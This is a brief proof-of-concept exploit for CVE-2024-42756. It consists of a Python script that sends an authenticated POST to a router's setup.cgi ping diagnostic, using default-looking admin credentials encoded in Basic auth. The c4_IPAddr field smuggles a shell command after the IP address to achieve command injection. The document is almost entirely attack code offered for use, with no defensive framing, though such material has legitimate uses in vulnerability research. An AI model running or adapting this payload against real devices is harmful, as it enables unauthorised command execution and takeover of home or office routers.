CVE-2024-42756
exp import requests
burp0_url = "http://192.168.0.1:80/setup.cgi"
burp0_headers = {"Cache-Control": "max-age=0", "Authorization": "Basic YWRtaW46cGFzc3dvcmQ=", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.0.1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://192.168.0.1/diag.htm&todo=cfg_init", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"IPAddr1": "192", "IPAddr2": "168", "IPAddr3": "0", "IPAddr4": "2", "ping": "Ping", "todo": "ping_test", "this_file": "diag.htm", "next_file": "diagping.htm", "c4_IPAddr": "192.168.0.2echo 2 > /tmp/nop
"}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
CVE-2024-42756